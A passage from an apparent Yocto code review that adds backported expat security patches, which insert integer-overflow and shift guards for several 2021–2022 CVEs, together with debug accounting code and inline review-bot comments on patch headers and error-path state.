1085+ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
1086+ }
1087+ fprintf(stderr, ellipis);
1088+ walker = after - contextLength;
1089+ for (; walker < after; walker++) {
1090+ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
1091+ }
1092+ }
1093+ fprintf(stderr, "\"\n");
1094+}
1095+
1096+static XML_Bool
1097+accountingDiffTolerated(XML_Parser originParser, int tok, const char *before,
1098+ const char *after, int source_line,
1099+ enum XML_Account account) {
1100+ /* Note: We need to check the token type *first* to be sure that
1101+ * we can even access variable <after>, safely.
1102+ * E.g. for XML_TOK_NONE <after> may hold an invalid pointer. */
1103+ switch (tok) {
1104+ case XML_TOK_INVALID:
1105+ case XML_TOK_PARTIAL:
1106+ case XML_TOK_PARTIAL_CHAR:
1107+ case XML_TOK_NONE:
1108+ return XML_TRUE;
1109+ }
1110+
1111+ if (account == XML_ACCOUNT_NONE)
1112+ return XML_TRUE; /* because these bytes have been accounted for, already */
1113+
1114+ unsigned int levelsAwayFromRootParser;
1115+ const XML_Parser rootParser
1116+ = getRootParserOf(originParser, &levelsAwayFromRootParser);
1117+ assert(! rootParser->m_parentParser);
1118+
1119+ const int isDirect
1120+ = (account == XML_ACCOUNT_DIRECT) && (originParser == rootParser);
1121+ const ptrdiff_t bytesMore = after - before;
1122+
1123+ XmlBigCount *const additionTarget
1124+ = isDirect ? &rootParser->m_accounting.countBytesDirect
1125+ : &rootParser->m_accounting.countBytesIndirect;
1126+
1127+ /* Detect and avoid integer overflow */
1128+ if (*additionTarget > (XmlBigCount)(-1) - (XmlBigCount)bytesMore)
1129+ return XML_FALSE;
1130+ *additionTarget += bytesMore;
1131+
1132+ const XmlBigCount countBytesOutput
1133+ = rootParser->m_accounting.countBytesDirect
1134+ + rootParser->m_accounting.countBytesIndirect;
1135+ const float amplificationFactor
1136+ = accountingGetCurrentAmplification(rootParser);
1137+ const XML_Bool tolerated
1138+ = (countBytesOutput < rootParser->m_accounting.activationThresholdBytes)
1139+ || (amplificationFactor
1140+ <= rootParser->m_accounting.maximumAmplificationFactor);
1141+
1142+ if (rootParser->m_accounting.debugLevel >= 2) {
1143+ accountingReportStats(rootParser, "");
1144+ accountingReportDiff(rootParser, levelsAwayFromRootParser, before, after,
1145+ bytesMore, source_line, account);
1146+ }
1147+
1148+ return tolerated;
1149+}
1150+
1151+static void
1152+entityTrackingReportStats(XML_Parser rootParser, ENTITY *entity,
1153+ const char *action, int sourceLine) {
1154+ assert(! rootParser->m_parentParser);
1155+ if (rootParser->m_entity_stats.debugLevel < 1)
1156+ return;
1157+
1158+# if defined(XML_UNICODE)
1159+ const char *const entityName = "[..]";
1160+# else
1161+ const char *const entityName = entity->name;
1162+# endif
1163+
1164+ fprintf(
1165+ stderr,
1166+ "expat: Entities(%p): Count %9d, depth %2d/%2d %*s%s%s; %s length %d (xmlparse.c:%d)\n",
1167+ (void *)rootParser, rootParser->m_entity_stats.countEverOpened,
1168+ rootParser->m_entity_stats.currentDepth,
1169+ rootParser->m_entity_stats.maximumDepthSeen,
1170+ (rootParser->m_entity_stats.currentDepth - 1) * 2, "",
1171+ entity->is_param ? "%" : "&", entityName, action, entity->textLen,
1172+ sourceLine);
1173+}
1174+
1175+static void
1176+entityTrackingOnOpen(XML_Parser originParser, ENTITY *entity, int sourceLine) {
1177+ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
1178+ assert(! rootParser->m_parentParser);
1179+
1180+ rootParser->m_entity_stats.countEverOpened++;
1181+ rootParser->m_entity_stats.currentDepth++;
1182+ if (rootParser->m_entity_stats.currentDepth
1183+ > rootParser->m_entity_stats.maximumDepthSeen) {
1184+ rootParser->m_entity_stats.maximumDepthSeen++;
1185+ }
1186+
1187+ entityTrackingReportStats(rootParser, entity, "OPEN ", sourceLine);
1188+}
1189+
1190+static void
1191+entityTrackingOnClose(XML_Parser originParser, ENTITY *entity, int sourceLine) {
1192+ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
1193+ assert(! rootParser->m_parentParser);
1194+
1195+ entityTrackingReportStats(rootParser, entity, "CLOSE", sourceLine);
1196+ rootParser->m_entity_stats.currentDepth--;
1197+}
1198+
1199+static XML_Parser
1200+getRootParserOf(XML_Parser parser, unsigned int *outLevelDiff) {
1201+ XML_Parser rootParser = parser;
1202+ unsigned int stepsTakenUpwards = 0;
1203+ while (rootParser->m_parentParser) {
1204+ rootParser = rootParser->m_parentParser;
1205+ stepsTakenUpwards++;
1206+ }
1207+ assert(! rootParser->m_parentParser);
1208+ if (outLevelDiff != NULL) {
1209+ *outLevelDiff = stepsTakenUpwards;
1210+ }
1211+ return rootParser;
1212+}
1213+
1214+static const char *
1215+unsignedCharToPrintable(unsigned char c) {
1216+ switch (c) {
1217+ case 0:
1218+ return "\\0";
1219+ case 1:
1220+ return "\\x1";
1221+ case 2:
1222+ return "\\x2";
1223+ case 3:
1224+ return "\\x3";
1225+ case 4:
1226+ return "\\x4";
1227+ case 5:
1228+ return "\\x5";
1229+ case 6:
1230+ return "\\x6";
1231+ case 7:
1232+ return "\\x7";
1233+ case 8:
1234+ return "\\x8";
1235+ case 9:
1236+ return "\\t";
1237+ case 10:
1238+ return "\\n";
1239+ case 11:
1240+ return "\\xB";
1241+ case 12:
1242+ return "\\xC";
1243+ case 13:
1244+ return "\\r";
1245+ case 14:
1246+ return "\\xE";
1247+ case 15:
1248+ return "\\xF";
1249+ case 16:
1250+ return "\\x10";
1251+ case 17:
1252+ return "\\x11";
1253+ case 18:
1254+ return "\\x12";
1255+ case 19:
1256+ return "\\x13";
1257+ case 20:
1258+ return "\\x14";
1259+ case 21:
1260+ return "\\x15";
1261+ case 22:
1262+ return "\\x16";
1263+ case 23:
1264+ return "\\x17";
1265+ case 24:
1266+ return "\\x18";
1267+ case 25:
1268+ return "\\x19";
1269+ case 26:
1270+ return "\\x1A";
1271+ case 27:
1272+ return "\\x1B";
1273+ case 28:
1274+ return "\\x1C";
1275+ case 29:
1276+ return "\\x1D";
1277+ case 30:
1278+ return "\\x1E";
1279+ case 31:
1280+ return "\\x1F";
1281+ case 32:
1282+ return " ";
1283+ case 33:
1284+ return "!";
1285+ case 34:
1286+ return "\\\"";
1287+ case 35:
1288+ return "#";
1289+ case 36:
1290+ return "$";
1291+ case 37:
1292+ return "%";
1293+ case 38:
1294+ return "&";
1295+ case 39:
1296+ return "'";
1297+ case 40:
1298+ return "(";
1299+ case 41:
1300+ return ")";
1301+ case 42:
1302+ return "*";
1303+ case 43:
1304+ return "+";
1305+ case 44:
1306+ return ",";
1307+ case 45:
1308+ return "-";
1309+ case 46:
1310+ return ".";
1311+ case 47:
1312+ return "/";
1313+ case 48:
1314+ return "0";
1315+ case 49:
1316+ return "1";
1317+ case 50:
1318+ return "2";
1319+ case 51:
1320+ return "3";
1321+ case 52:
1322+ return "4";
1323+ case 53:
1324+ return "5";
1325+ case 54:
1326+ return "6";
1327+ case 55:
1328+ return "7";
1329+ case 56:
1330+ return "8";
1331+ case 57:
1332+ return "9";
1333+ case 58:
1334+ return ":";
1335+ case 59:
1336+ return ";";
1337+ case 60:
1338+ return "<";
1339+ case 61:
1340+ return "=";
1341+ case 62:
1342+ return ">";
1343+ case 63:
1344+ return "?";
1345+ case 64:
1346+ return "@";
1347+ case 65:
1348+ return "A";
1349+ case 66:
1350+ return "B";
1351+ case 67:
1352+ return "C";
1353+ case 68:
1354+ return "D";
1355+ case 69:
1356+ return "E";
1357+ case 70:
1358+ return "F";
1359+ case 71:
1360+ return "G";
1361+ case 72:
1362+ return "H";
1363+ case 73:
1364+ return "I";
1365+ case 74:
1366+ return "J";
1367+ case 75:
1368+ return "K";
1369+ case 76:
1370+ return "L";
1371+ case 77:
1372+ return "M";
1373+ case 78:
1374+ return "N";
1375+ case 79:
1376+ return "O";
1377+ case 80:
1378+ return "P";
1379+ case 81:
1380+ return "Q";
1381+ case 82:
1382+ return "R";
1383+ case 83:
1384+ return "S";
1385+ case 84:
1386+ return "T";
1387+ case 85:
1388+ return "U";
1389+ case 86:
1390+ return "V";
1391+ case 87:
1392+ return "W";
1393+ case 88:
1394+ return "X";
1395+ case 89:
1396+ return "Y";
1397+ case 90:
1398+ return "Z";
1399+ case 91:
1400+ return "[";
1401+ case 92:
1402+ return "\\\\";
1403+ case 93:
1404+ return "]";
1405+ case 94:
1406+ return "^";
1407+ case 95:
1408+ return "_";
1409+ case 96:
1410+ return "`";
1411+ case 97:
1412+ return "a";
1413+ case 98:
1414+ return "b";
1415+ case 99:
1416+ return "c";
1417+ case 100:
1418+ return "d";
1419+ case 101:
1420+ return "e";
1421+ case 102:
1422+ return "f";
1423+ case 103:
1424+ return "g";
1425+ case 104:
1426+ return "h";
1427+ case 105:
1428+ return "i";
1429+ case 106:
1430+ return "j";
1431+ case 107:
1432+ return "k";
1433+ case 108:
1434+ return "l";
1435+ case 109:
1436+ return "m";
1437+ case 110:
1438+ return "n";
1439+ case 111:
1440+ return "o";
1441+ case 112:
1442+ return "p";
1443+ case 113:
1444+ return "q";
1445+ case 114:
1446+ return "r";
1447+ case 115:
1448+ return "s";
1449+ case 116:
1450+ return "t";
1451+ case 117:
1452+ return "u";
1453+ case 118:
1454+ return "v";
1455+ case 119:
1456+ return "w";
1457+ case 120:
1458+ return "x";
1459+ case 121:
1460+ return "y";
1461+ case 122:
1462+ return "z";
1463+ case 123:
1464+ return "{";
1465+ case 124:
1466+ return "|";
1467+ case 125:
1468+ return "}";
1469+ case 126:
1470+ return "~";
1471+ case 127:
1472+ return "\\x7F";
1473+ case 128:
1474+ return "\\x80";
1475+ case 129:
1476+ return "\\x81";
1477+ case 130:
1478+ return "\\x82";
1479+ case 131:
1480+ return "\\x83";
1481+ case 132:
1482+ return "\\x84";
1483+ case 133:
1484+ return "\\x85";
1485+ case 134:
1486+ return "\\x86";
1487+ case 135:
1488+ return "\\x87";
1489+ case 136:
1490+ return "\\x88";
1491+ case 137:
1492+ return "\\x89";
1493+ case 138:
1494+ return "\\x8A";
1495+ case 139:
1496+ return "\\x8B";
1497+ case 140:
1498+ return "\\x8C";
1499+ case 141:
1500+ return "\\x8D";
1501+ case 142:
1502+ return "\\x8E";
1503+ case 143:
1504+ return "\\x8F";
1505+ case 144:
1506+ return "\\x90";
1507+ case 145:
1508+ return "\\x91";
1509+ case 146:
1510+ return "\\x92";
1511+ case 147:
1512+ return "\\x93";
1513+ case 148:
1514+ return "\\x94";
1515+ case 149:
1516+ return "\\x95";
1517+ case 150:
1518+ return "\\x96";
1519+ case 151:
1520+ return "\\x97";
1521+ case 152:
1522+ return "\\x98";
1523+ case 153:
1524+ return "\\x99";
1525+ case 154:
1526+ return "\\x9A";
1527+ case 155:
1528+ return "\\x9B";
1529+ case 156:
1530+ return "\\x9C";
1531+ case 157:
1532+ return "\\x9D";
1533+ case 158:
1534+ return "\\x9E";
1535+ case 159:
1536+ return "\\x9F";
1537+ case 160:
1538+ return "\\xA0";
1539+ case 161:
1540+ return "\\xA1";
1541+ case 162:
1542+ return "\\xA2";
1543+ case 163:
1544+ return "\\xA3";
1545+ case 164:
1546+ return "\\xA4";
1547+ case 165:
1548+ return "\\xA5";
1549+ case 166:
1550+ return "\\xA6";
1551+ case 167:
1552+ return "\\xA7";
1553+ case 168:
1554+ return "\\xA8";
1555+ case 169:
1556+ return "\\xA9";
1557+ case 170:
1558+ return "\\xAA";
1559+ case 171:
1560+ return "\\xAB";
1561+ case 172:
1562+ return "\\xAC";
1563+ case 173:
1564+ return "\\xAD";
1565+ case 174:
1566+ return "\\xAE";
1567+ case 175:
1568+ return "\\xAF";
1569+ case 176:
1570+ return "\\xB0";
1571+ case 177:
1572+ return "\\xB1";
1573+ case 178:
1574+ return "\\xB2";
1575+ case 179:
1576+ return "\\xB3";
1577+ case 180:
1578+ return "\\xB4";
1579+ case 181:
1580+ return "\\xB5";
1581+ case 182:
1582+ return "\\xB6";
1583+ case 183:
1584+ return "\\xB7";
1585+ case 184:
1586+ return "\\xB8";
1587+ case 185:
1588+ return "\\xB9";
1589+ case 186:
1590+ return "\\xBA";
1591+ case 187:
1592+ return "\\xBB";
1593+ case 188:
1594+ return "\\xBC";
1595+ case 189:
1596+ return "\\xBD";
1597+ case 190:
1598+ return "\\xBE";
1599+ case 191:
1600+ return "\\xBF";
1601+ case 192:
1602+ return "\\xC0";
1603+ case 193:
1604+ return "\\xC1";
1605+ case 194:
1606+ return "\\xC2";
1607+ case 195:
1608+ return "\\xC3";
1609+ case 196:
1610+ return "\\xC4";
1611+ case 197:
1612+ return "\\xC5";
1613+ case 198:
1614+ return "\\xC6";
1615+ case 199:
1616+ return "\\xC7";
1617+ case 200:
1618+ return "\\xC8";
1619+ case 201:
1620+ return "\\xC9";
1621+ case 202:
1622+ return "\\xCA";
1623+ case 203:
1624+ return "\\xCB";
1625+ case 204:
1626+ return "\\xCC";
1627+ case 205:
1628+ return "\\xCD";
1629+ case 206:
1630+ return "\\xCE";
1631+ case 207:
1632+ return "\\xCF";
1633+ case 208:
1634+ return "\\xD0";
1635+ case 209:
1636+ return "\\xD1";
1637+ case 210:
1638+ return "\\xD2";
1639+ case 211:
1640+ return "\\xD3";
1641+ case 212:
1642+ return "\\xD4";
1643+ case 213:
1644+ return "\\xD5";
1645+ case 214:
1646+ return "\\xD6";
1647+ case 215:
1648+ return "\\xD7";
1649+ case 216:
1650+ return "\\xD8";
1651+ case 217:
1652+ return "\\xD9";
1653+ case 218:
1654+ return "\\xDA";
1655+ case 219:
1656+ return "\\xDB";
1657+ case 220:
1658+ return "\\xDC";
1659+ case 221:
1660+ return "\\xDD";
1661+ case 222:
1662+ return "\\xDE";
1663+ case 223:
1664+ return "\\xDF";
1665+ case 224:
1666+ return "\\xE0";
1667+ case 225:
1668+ return "\\xE1";
1669+ case 226:
1670+ return "\\xE2";
1671+ case 227:
1672+ return "\\xE3";
1673+ case 228:
1674+ return "\\xE4";
1675+ case 229:
1676+ return "\\xE5";
1677+ case 230:
1678+ return "\\xE6";
1679+ case 231:
1680+ return "\\xE7";
1681+ case 232:
1682+ return "\\xE8";
1683+ case 233:
1684+ return "\\xE9";
1685+ case 234:
1686+ return "\\xEA";
1687+ case 235:
1688+ return "\\xEB";
1689+ case 236:
1690+ return "\\xEC";
1691+ case 237:
1692+ return "\\xED";
1693+ case 238:
1694+ return "\\xEE";
1695+ case 239:
1696+ return "\\xEF";
1697+ case 240:
1698+ return "\\xF0";
1699+ case 241:
1700+ return "\\xF1";
1701+ case 242:
1702+ return "\\xF2";
1703+ case 243:
1704+ return "\\xF3";
1705+ case 244:
1706+ return "\\xF4";
1707+ case 245:
1708+ return "\\xF5";
1709+ case 246:
1710+ return "\\xF6";
1711+ case 247:
1712+ return "\\xF7";
1713+ case 248:
1714+ return "\\xF8";
1715+ case 249:
1716+ return "\\xF9";
1717+ case 250:
1718+ return "\\xFA";
1719+ case 251:
1720+ return "\\xFB";
1721+ case 252:
1722+ return "\\xFC";
1723+ case 253:
1724+ return "\\xFD";
1725+ case 254:
1726+ return "\\xFE";
1727+ case 255:
1728+ return "\\xFF";
1729+ default:
1730+ assert(0); /* never gets here */
1731+ return "dead code";
1732+ }
1733+ assert(0); /* never gets here */
1734+}
1735+
1736+#endif /* XML_DTD */
1737+
1738+static unsigned long
1739+getDebugLevel(const char *variableName, unsigned long defaultDebugLevel) {
1740+ const char *const valueOrNull = getenv(variableName);
1741+ if (valueOrNull == NULL) {
1742+ return defaultDebugLevel;
1743+ }
1744+ const char *const value = valueOrNull;
1745+
1746+ errno = 0;
1747+ char *afterValue = (char *)value;
1748+ unsigned long debugLevel = strtoul(value, &afterValue, 10);
1749+ if ((errno != 0) || (afterValue[0] != '\0')) {
1750+ errno = 0;
1751+ return defaultDebugLevel;
1752+ }
1753+
1754+ return debugLevel;
1755+}
1756--
17572.32.0
1758
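--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
@@ -0,0 +1,65 @@
+From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 27 Dec 2021 20:15:02 +0100
+Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
+ storeAtts (CVE-2021-45960)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
+
+CVE: CVE-2021-45960
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
+ 1 file changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d730f41c3..b47c31b05 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ if (nPrefixes) {
+ int j; /* hash table index */
+ unsigned long version = parser->m_nsAttsVersion;
+- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
+ unsigned char oldNsAttsPower = parser->m_nsAttsPower;
+ /* size of hash table must be at least 2 * (# of prefixed attributes) */
+ if ((nPrefixes << 1)
+@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ ;
+ if (parser->m_nsAttsPower < 3)
+ parser->m_nsAttsPower = 3;
+- nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ nsAttsSize = 1u << parser->m_nsAttsPower;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
+ nsAttsSize * sizeof(NS_ATT));
+ if (! temp) {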
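Review bot: The embedded patch header names two different paths: its `diff --git` line and diffstat say `expat/lib/xmlparse.c`, while the `---`/`+++` lines say `lib/xmlparse.c`. Tools that cross-check git headers (for example `git apply` or `git am`) can reject a patch on that mismatch, so this fix only applies under patch tools that ignore the `diff --git` line, and the recipe's patch tool is not visible here; writing the line as `diff --git a/lib/xmlparse.c b/lib/xmlparse.c` removes the dependency. The same mismatch appears in the CVE-2021-46143, CVE-2022-22822-27 and CVE-2022-23852 patches on this page. The tag is also written as `Upstream-Status: Backport:` with the URL on the following line; the usual one-line form `Upstream-Status: Backport [URL]` is more likely to be accepted by tag-checking tooling.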
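--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
@@ -0,0 +1,49 @@
+From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 25 Dec 2021 20:52:08 +0100
+Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
+ doProlog (CVE-2021-46143)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/538/commits/85ae9a2d7d0e9358f356b33977b842df8ebaec2b
+
+CVE: CVE-2021-46143
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ expat/lib/xmlparse.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index b47c31b0..8f243126 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_prologState.level >= parser->m_groupSize) {
+ if (parser->m_groupSize) {
+ {
++ /* Detect and prevent integer overflow */
++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ char *const new_connector = (char *)REALLOC(
+ parser, parser->m_groupConnector, parser->m_groupSize *= 2);
+ if (new_connector == NULL) {
+@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+
+ if (dtd->scaffIndex) {
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ int *const new_scaff_index = (int *)REALLOC(
+ parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
+ if (new_scaff_index == NULL)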
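Review bot: The second added guard, ahead of the `dtd->scaffIndex` REALLOC, returns `XML_ERROR_NO_MEMORY` without undoing the `parser->m_groupSize *= 2` already performed inside the REALLOC call of the first hunk, assuming both hunks sit in the same branch as their line numbers suggest. After that return `m_groupSize` would describe more slots than `dtd->scaffIndex` holds, whereas the CVE-2021-45960 patch restores `m_nsAttsPower` before bailing out. The guard only compiles where `UINT_MAX >= SIZE_MAX`, so the window is narrow, but testing before the doubling keeps the state consistent, e.g. `if (dtd->scaffIndex && parser->m_groupSize > (size_t)(-1) / sizeof(int) / 2u) return XML_ERROR_NO_MEMORY;` inside the same `#if`, placed next to the first check. Both enclosing blocks continue outside the hunks, so what the caller does with the parser after this error should be confirmed there.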
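--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
@@ -0,0 +1,257 @@
+From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Thu, 30 Dec 2021 22:46:03 +0100
+Subject: [PATCH] lib: Prevent integer overflow at multiple places
+ (CVE-2022-22822 to CVE-2022-22827)
+
+The involved functions are:
+- addBinding (CVE-2022-22822)
+- build_model (CVE-2022-22823)
+- defineAttribute (CVE-2022-22824)
+- lookup (CVE-2022-22825)
+- nextScaffoldPart (CVE-2022-22826)
+- storeAtts (CVE-2022-22827)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e
+
+CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 151 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 8f243126..575e73ee 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+
+ /* get the attributes from the tokenizer */
+ n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - nDefaultAtts) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ if (n + nDefaultAtts > parser->m_attsSize) {
+ int oldAttsSize = parser->m_attsSize;
+ ATTRIBUTE *temp;
+ #ifdef XML_ATTR_INFO
+ XML_AttrInfo *temp2;
+ #endif
++
++ /* Detect and prevent integer overflow */
++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
+ parser->m_attsSize * sizeof(ATTRIBUTE));
+ if (temp == NULL) {
+@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ }
+ parser->m_atts = temp;
+ #ifdef XML_ATTR_INFO
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++# if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++# endif
++
+ temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
+ parser->m_attsSize * sizeof(XML_AttrInfo));
+ if (temp2 == NULL) {
+@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ tagNamePtr->prefixLen = prefixLen;
+ for (i = 0; localPart[i++];)
+ ; /* i includes null terminator */
++
++ /* Detect and prevent integer overflow */
++ if (binding->uriLen > INT_MAX - prefixLen
++ || i > INT_MAX - (binding->uriLen + prefixLen)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ n = i + binding->uriLen + prefixLen;
+ if (n > binding->uriAlloc) {
+ TAG *p;
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
+ if (! uri)
+ return XML_ERROR_NO_MEMORY;
+@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (parser->m_freeBindingList) {
+ b = parser->m_freeBindingList;
+ if (len > b->uriAlloc) {
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ XML_Char *temp = (XML_Char *)REALLOC(
+ parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (temp == NULL)
+@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ b = (BINDING *)MALLOC(parser, sizeof(BINDING));
+ if (! b)
+ return XML_ERROR_NO_MEMORY;
++
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ b->uri
+ = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (! b->uri) {
+@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata,
+ }
+ } else {
+ DEFAULT_ATTRIBUTE *temp;
++
++ /* Detect and prevent integer overflow */
++ if (type->allocDefaultAtts > INT_MAX / 2) {
++ return 0;
++ }
++
+ int count = type->allocDefaultAtts * 2;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
++ return 0;
++ }
++#endif
++
+ temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
+ (count * sizeof(DEFAULT_ATTRIBUTE)));
+ if (temp == NULL)
+@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) {
+ /* check for overflow (table is half full) */
+ if (table->used >> (table->power - 1)) {
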